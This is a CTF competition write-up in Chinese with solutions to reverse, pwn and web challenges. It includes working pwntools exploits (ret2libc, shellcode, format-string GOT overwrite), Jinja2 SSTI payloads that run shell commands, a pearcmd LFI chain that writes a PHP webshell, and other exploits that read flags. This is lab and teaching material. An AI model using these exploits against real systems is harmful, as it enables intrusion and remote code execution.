9 100 7 9 lim 3
5 loop1
...
9 1 9 100 7 0 9 100 8
C loop2
是一个循环
for(i=A;i<lim;i++) {
	...
}

发现流程由三个循环和一些赋值组成，且代码由Str[100]作为循环的i

分析一下三个循环中分别为

for(int i=0;i<25;i++) Str[i]=Str[i]^Str[i+1]
for(int i=0;i<24;i++) Str[i+1]+=Str[i]-i
{for(int i=1;i<25;i++) if(Str[i]!=Str[i+49]) return wrong; return right;}

爆破一下Str[0]，倒着做即可

ez_unity

先找到核心代码文件 .\XuhanYilun_Data\Managed\Assembly-CSharp.dll

用ILSpy反编译，在项目中找到GameManager.cs

打开GameManager.cs ，在 Update函数中发现这样一段

把这一段去掉后重新编译成dll替换掉原来的Assembly-CSharp.dll

这样人物就不会死亡了

ez_xxx

一眼SMC

patch掉反调试部分后dump出内存，分析内存数据。

写出exp

target = [0x7E,0x1F,0x43,0x5E,0x1F,0x50,0x4B,0x45,0x5F,0x4B,0x4D,0x5A,0x4B,0x44,0x5B,0x5A,0x41,0x5F,0x50,0x4B,0x42,0x5E,0x45,0x41,0x5A,0x40,0x58,0x55,0x4B,0x4D,0x5A,0x40,0x4B,0x5F,0x45,0x5A,0x43,0x58,0x41,0x4B,0x59,0x4D,0x5A]

for i in target:
	print(chr((i ^ 0x28) - 4), end = "")

ez_dp

使用pyinstxtractor工具分解出pyc

猜测函数主逻辑位于 t4.pyc，反编译。

import wx, wx.xrc, random

class MyDialog1(wx.Dialog):
    x = 123
    y = 321
    tot = 0
    zq = 0
    flag = 0

    def __init__(self, parent):
        wx.Dialog.__init__(self, parent, id=(wx.ID_ANY), title=(wx.EmptyString), pos=(wx.DefaultPosition), size=(wx.Size(400, 200)), style=(wx.DEFAULT_DIALOG_STYLE))
        self.SetSizeHintsSz(wx.DefaultSize, wx.DefaultSize)
        bSizer1 = wx.BoxSizer(wx.VERTICAL)
        self.m_staticText1 = wx.StaticText(self, wx.ID_ANY, '123+321', wx.DefaultPosition, wx.DefaultSize, 0)
        self.m_staticText1.Wrap(-1)
        self.m_staticText1.SetFont(wx.Font(36, 70, 90, 90, False, '宋体'))
        bSizer1.Add(self.m_staticText1, 0, wx.ALL, 5)
        self.m_textCtrl1 = wx.TextCtrl(self, wx.ID_ANY, '在此输入您的答案', wx.DefaultPosition, wx.DefaultSize, wx.TE_PROCESS_ENTER)
        bSizer1.Add(self.m_textCtrl1, 0, wx.ALL, 5)
        self.m_button2 = wx.Button(self, wx.ID_ANY, '提交', wx.DefaultPosition, wx.DefaultSize, 0)
        bSizer1.Add(self.m_button2, 0, wx.ALL, 5)
        self.m_staticText2 = wx.StaticText(self, wx.ID_ANY, '做出9999999道加法题,而且准确率为100%就给你flag', wx.DefaultPosition, wx.DefaultSize, 0)
        self.m_staticText2.Wrap(-1)
        bSizer1.Add(self.m_staticText2, 0, wx.ALL, 5)
        self.SetSizer(bSizer1)
        self.Layout()
        self.Centre(wx.BOTH)
        self.m_textCtrl1.Bind(wx.EVT_TEXT_ENTER, self.tj)
        self.m_button2.Bind(wx.EVT_BUTTON, self.tj)

    def __del__(self):
        pass

    def gogogo(self, x):
        if x >= 100:
            self.flag += 1
            return
        self.gogogo(x + 1)
        self.gogogo(x + 2)

    def get_flag(self):
        self.gogogo(0)
        return self.flag

    def tj(self, event):
        self.tot += 1
        ans = self.m_textCtrl1.Value
        try:
            if eval(ans) == self.x + self.y:
                self.zq += 1
                self.m_staticText2.Label = '答案正确   正确率：' + str(self.zq) + '/' + str(self.tot)
            else:
                self.m_staticText2.Label = '答案错误   正确率：' + str(self.zq) + '/' + str(self.tot)
        except:
            self.m_staticText2.Label = '未知错误   正确率：' + str(self.zq) + '/' + str(self.tot)
        else:
            if self.zq >= 9999999:
                if self.zq == self.tot:
                    a = self.get_flag()
                    self.m_staticText2.Label = 'scuctf{' + str(a) + '}'
            self.m_textCtrl1.Value = ''
            self.x = random.choice(range(1000))
            self.y = random.choice(range(1000))
            self.m_staticText1.Label = str(self.x) + '+' + str(self.y)


app = wx.App(False)
zjm = MyDialog1(None)
zjm.Show(True)
app.MainLoop()

发现是斐波拉契数列。

ez_android

JADI分析.apk，函数主逻辑位于`com/example.check/MainActivity

package com.example.check;

import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import androidx.appcompat.app.AppCompatActivity;
import com.example.check.databinding.ActivityMainBinding;

/* loaded from: classes.dex */
public class MainActivity extends AppCompatActivity {
    private ActivityMainBinding binding;
    private int click_times = 0;
    private String string = new String();
    private TextView textView;

    public native int check_s(String str);

    public native String stringFromJNI();

    static {
        System.loadLibrary("check");
    }

    /* JADX INFO: Access modifiers changed from: protected */
    @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());
        this.binding = inflate;
        setContentView(inflate.getRoot());
        this.textView = (TextView) findViewById(R.id.textView2);
        ((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.1
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click1();
            }
        });
        ((Button) findViewById(R.id.button2)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.2
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click2();
            }
        });
        ((Button) findViewById(R.id.button3)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.3
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click3();
            }
        });
        ((Button) findViewById(R.id.button4)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.4
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click4();
            }
        });
        ((Button) findViewById(R.id.button5)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.5
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click5();
            }
        });
        ((Button) findViewById(R.id.button6)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.6
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click6();
            }
        });
        ((Button) findViewById(R.id.button7)).setOnClickListener(new View.OnClickListener() { // from class: com.example.check.MainActivity.7
            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                MainActivity.this.click7();
            }
        });
    }

    private void update() {
        int i = this.click_times + 1;
        this.click_times = i;
        if (i >= 1000) {
            this.textView.setText("scuctf{I_do_not_like_Android}");
        } else {
            this.textView.setText("你已经点击" + String.valueOf(this.click_times) + "次,加油!");
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click1() {
        update();
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click2() {
        update();
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click3() {
        update();
        this.string += '0';
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click4() {
        update();
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click5() {
        update();
        this.string += '1';
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click6() {
        update();
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void click7() {
        update();
        if (check_s(this.string) == 0) {
            this.textView.setText("nice");
            String str = new String();
            String str2 = new String();
            for (int hashCode = this.string.hashCode(); hashCode != 0; hashCode /= 10) {
                str = str + String.valueOf(hashCode % 10);
            }
            for (int i = 0; i < str.length(); i++) {
                str2 = str2 + String.valueOf((int) str.charAt(i));
            }
            this.textView.setText("scuctf{" + str2 + "}");
        }
    }
}

基本逻辑：通过 click3和 click5生成一串01串。调用native层函数check_s检验

找到判断函数后为依次解析二进制，返回表中对应，把flag中的字符反射成二进制后拼起来即可

exp

public class android {
    public static void main(String[] args) {
        String string = "111110010001111100001001111111101111010111111110110111111101000001001001011100111111101111110111111100011111000111111100001111100100011111000010011111110000111110011100010000010100110000000111111101000110101111111111101111100111100100000010111001111100111111111111001000111110000100111111110111101011111111011011111111101010000001111110111111000101011111110101011111101111100011111111010010000001010011001100011111001111111101101111111000001011011010010100101111111010010100010001111100011111111111110010100110000010100010111001100";
        String str = new String();
        String str2 = new String();
        for (int hashCode = string.hashCode(); hashCode != 0; hashCode /= 10) {
            str = str + String.valueOf(hashCode % 10);
        }
        System.out.println(string.hashCode());
        for (int i = 0; i < str.length(); i++) {
            str2 = str2 + String.valueOf((int) str.charAt(i));
        }

        System.out.println("scuctf{" + str2 + "}");
    }
}

PWN

2048_game

测试2048水平？（雾

test_your_nc

nc & cat flag即可。

ret2text

from pwn import *
elf = ELF("ret2text")
payload = b"A" * (32 + 4 + 4)
payload += p32(0x08049256)
sh = remote("114.117.187.56", 10002)
sh.sendline(payload)
sh.interactive()

ret2shellcode

from pwn import *
context(arch = "amd64", os = "linux")
sh = remote("114.117.187.56", 10003)
sh.recv()
sh.sendline(asm(shellcraft.sh()))
sh.recv()
sh.sendline(b"A" * (32 + 8) + p64(0x4040A0))
sh.interactive()

ret2libc

from pwn import *
from LibcSearcher import *
context(log_level = "debug")
context.terminal = ["konsole", "-e"]
elf = ELF("ret2libc")
elf_puts_got = elf.got["puts"]
elf_puts_plt = elf.plt["puts"]
__libc_start_main_got = elf.got["__libc_start_main"]
__libc_start_main_symb = elf.symbols["__libc_start_main"]
main_symb = 0x4010F0
pop_rdi_ret = 0x401333
pop_rsi_pop_r15_ret = 0x401331
ret = 0x40101a

# sh = process("./ret2libc")
sh = remote("114.117.187.56", "10007")
# gdb.attach(sh)
payload1 = b"A" * (32 + 8) + p64(pop_rdi_ret)
payload1 += p64(elf_puts_got)
payload1 += p64(elf_puts_plt)
payload1 += p64(main_symb)
sh.recv()
sh.sendline(payload1)
# print(leaked_puts_str)
leaked_puts_str = sh.recvuntil(b"\nDo")# .rjust(b"\x00")
sh.recv()
# print(leaked_puts_str)
puts_real = (u64(leaked_puts_str[1:-3].ljust(8, b"\x00")))
print(hex(puts_real))
searcher = LibcSearcher("puts", puts_real)
# searcher.select_libc(6)
# print(searcher)
libc_base = puts_real - searcher.dump("puts")
payload2 = b"A" * (32 + 8) + p64(pop_rdi_ret)
str_bin_sh = searcher.dump("str_bin_sh") + libc_base
payload2 += p64(str_bin_sh)
# print(str_bin_sh)
system_sh = searcher.dump("system") + libc_base
# system_sh = puts_real
# print(hex(system_sh))
payload2 += p64(ret)
payload2 += p64(system_sh)
# print(payload2)
# payload2 += p64(main_symb)
sh.sendline(payload2)
# sh.recv()
sh.interactive()

fmt

from pwn import *
from LibcSearcher import *
context(log_level = "debug", terminal = ["konsole", "-e"], arch = "amd64")
# sh = process("./fmt")
# gdb.attach(sh)

sh = remote("114.117.187.56", "10004")
elf = ELF("./fmt")
libc = ELF("./libc.so.6")
# sh.recv()
payload_leak = b"%7$08sBB"
payload_leak += p64(elf.got["__libc_start_main"])
sh.recv()
sh.sendline(payload_leak)
leaked_libc_start_main = sh.recvuntil(b"BB")
leaked_libc_start_main = u64(leaked_libc_start_main[2:-2].ljust(8, b"\x00"))
libc_s = LibcSearcher("__libc_start_main", leaked_libc_start_main)

printf_got = elf.got["printf"]

payload_leak2 = b"%7$08sBB"
payload_leak2 += p64(elf.got["puts"])
sh.recv()
sh.sendline(payload_leak2)
sh.recv()
leaked_puts = sh.recvuntil(b"BB")
leaked_puts = u64(leaked_puts[2:-2].ljust(8, b"\x00"))
print(leaked_puts)
libc_s.add_condition("puts", leaked_puts)
libc_s.select_libc(0)
# print(libc_s.dump("str_bin_sh"))
libc_base = leaked_libc_start_main - libc_s.dump("__libc_start_main")
system_addr = libc_s.dump("system") + libc_base
printf_addr = libc_s.dump("printf") + libc_base
# strncmp_addr = elf.got["strncmp"]

print(hex(printf_got))
print(hex(system_addr))
# print(hex(printf_addr))
# print(hex(system_addr % (16 ** 8)))
payload = fmtstr_payload(6, {printf_got : system_addr})
# payload = "%"
# payload = fmtstr_payload(7, {printf_got:system_addr})
print(len(payload))
sh.sendline(payload)
sh.recv()
sh.sendline(b"/bin/sh")
sh.interactive()

'''
in 1st case
0x7f47e26a0c90
0x7f47e2691290

other

0x7f97d4037c90
0x7f97d4028290

0x7f70c6c4dc90
0x7f70c6c3e290
'''
sh.recv()

'''
0x70    0x17    0xfd    0x1d    0x7e    0x7f    0x00    0x00
0x00007f7e1dfd1770
70 1

0x404038 <printf@got.plt>:      0x70    0x97    0xb2    0x9b    0xa0    0x7f    0x00    0x00
0x404040 <alarm@got.plt>:       0xa0    0xc1    0xba    0x9b    0xa0    0x7f    0x00    0x00
0x404048 <read@got.plt>:        0x00    0x10    0xbd    0x9b    0xa0    0x7f    0x00    0x00
0x404050 <signal@got.plt>:      0x80    0x28    0xb1    0x9b    0xa0    0x7f    0x00    0x00
0x7fa09bb233d0
0x7fa09bb29770
0x00007fa09bb29770
<printf@got.plt>:      0x70    0x97    0xb2    0x9b    0xa0    0x7f    0x00    0x00

<printf@got.plt>:      0x00007ff660ecd770      0x00007ff660f501a0
'''

Web

CheckIn

数组绕过hash函数

import requests
url = "http://114.117.187.56:11000/"
r = requests.post(url, params = {"a[]" : 1}, data = {"b[]" : 2})
print(r.text)

Include

伪协议读取 flag.php。

import requests
from base64 import *
url = "http://114.117.187.56:11002/"
# http://114.117.187.56:11002/?file=php://filter/read=convert.base64-encode/resource=flag.php
r = requests.post(url, params = {"file" : r"php://filter/read=convert.base64-encode/resource=flag.php"})
# print(r.text)
print(b64decode(b"PD9waHANCiRmbGFnID0gJ3NjdWN0Zns2YWZmNWE3N2JhNjg1ODY1MTVhYTViMGE5YTFiZTVhMn0nOw=="))

easy_flask

首先爆破出Popen在哪个subclasses中

import requests

# payload1 = '''{%print(().__getattribute__("__ssalc__"[::-1]).__getattribute__("__esab__"[::-1]).__getattribute__("__sessalcbus__"[::-1])['''
# payload2 = '''].__getattribute__("__tini__"[::-1]).__getattribute__("__slabolg__")['__buil'+'tins__']["ev" + "al"]("'''
# payload3 = '''"))%}'''
# {% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())[139]|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]("curl tiger1218.com") == "chiv"%} a {% endif %}

payload1 = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())['''
payload2 = ''']|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]("sleep 50") == "chiv"%} a {% endif %}'''

# print(payload1 + payload2 + payload3)

# p
tmp = 0

for i in range(200):
	prams = {"name" : payload1 + str(i) + payload2}
	# print(prams["name"])
	req = requests.get("http://114.117.187.56:11003/view", params = prams)
	if(req.text != tmp):
		tmp = req.text
		print(i, req.text)

爆破出是第139个。

不能出网，盲注。

import requests
from string import printable

payload = '''{% if ((()|attr("__ssalc__"[::-1])|attr("__esab__"[::-1])|attr("__sessalcbus__"[::-1])())[137]|attr("__tini__"[::-1])|attr("__slabolg__"[::-1]))["popen"]('galf/ tac'[::-1]).read()['''
# index = str(1)
payload2 = ''']=="'''
# char = chr(i)
payload3 = '''"%} a {% endif %}'''

for index in range(100):
	flag = 1
	for char in printable:
		param = {"name" : payload + str(index) + payload2 + char + payload3}
		# print(param["name"])
		req = requests.get("http://114.117.187.56:11003/view", params = param)
		if req.text == "Ok":
			print(char, end = "")
			break
		elif req.text != "NO":
			flag = 0
	
	# if not flag:
	# 	break

JSJSJS

import requests
from base64 import *
url = "http://114.117.187.56:11005/api/flag"
r = requests.post(url)
print(r.text)

baby_ip

import requests
from base64 import *
url = "http://114.117.187.56:11004/"
r = requests.post(url, data={"password" : b64decode(b"aGdneXlkcw==")}, headers={"X-Forwarded-For": "127.0.0.1"})
print(r.text)

可爱的探针

import requests
from base64 import *
url = "http://117.50.188.49:1145/tz.php"
r = requests.post(url, params={"act": "phpinfo"})
print(r.text)

python tmp_web.py | grep SCUCTF

真ikun进

view http://114.117.187.56:11006/js/game.js?s=4

let flag = "c23Rme22QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0=";
const regex = /lgg/g;

String.prototype.insetAt = function(str,offset){
    var regx = new RegExp("(.{"+offset+"})");
    return this.replace(regx,"$1"+str);
};

if(regex.test("lgg")){
    flag = flag.insetAt('N1Y',2);
}
if(regex.test("lgg")){
    flag = flag.insetAt("QC2",6);
}
if(regex.test("yuelgg")){
    flag = flag.insetAt('JiY',10);
}
if(regex.test("yuelgg")){
    flag = flag.insetAt('C3Y',14);
}

let trueflag = flag;

run this code

echo c2N1Y3Rme2JiY2QwOTJlLTYyNDQtMTFlZC1hYTFhLWM4NThjMDllYjE0MH0= | base64 -d

简单的CMS

被编码问题坑惨了。。。。

http://114.117.187.56:12000/?+config-create+/&r=../../../../../../../../../../../usr/share/php/pearcmd&/<?=print(1);?>+/tmp/ktou.php

import requests
from base64 import *
url = "http://114.117.187.56:12000/"
r = requests.post(url, params={"r": '''../../../../../../../../tmp/ktou'''}, data = {"1":'''system("cat /flag*");'''})
print(r.text)

unserialize

import requests
from base64 import *
url = "http://114.117.187.56:11008/"
r = requests.post(url, params={"p": '''O:1:"A":2:{s:3:"kfc";s:7:"v_me_50";}'''})
print(r.text)

ezbypass

环境崩了。说下思路

http://43.142.108.183:8085/?url=php://filter/read=convert.iconv.UTF-16BE.UTF-32BE/resource=/flag
对这串base64解码，去除所有 \x00的byte，就可以得到flag了。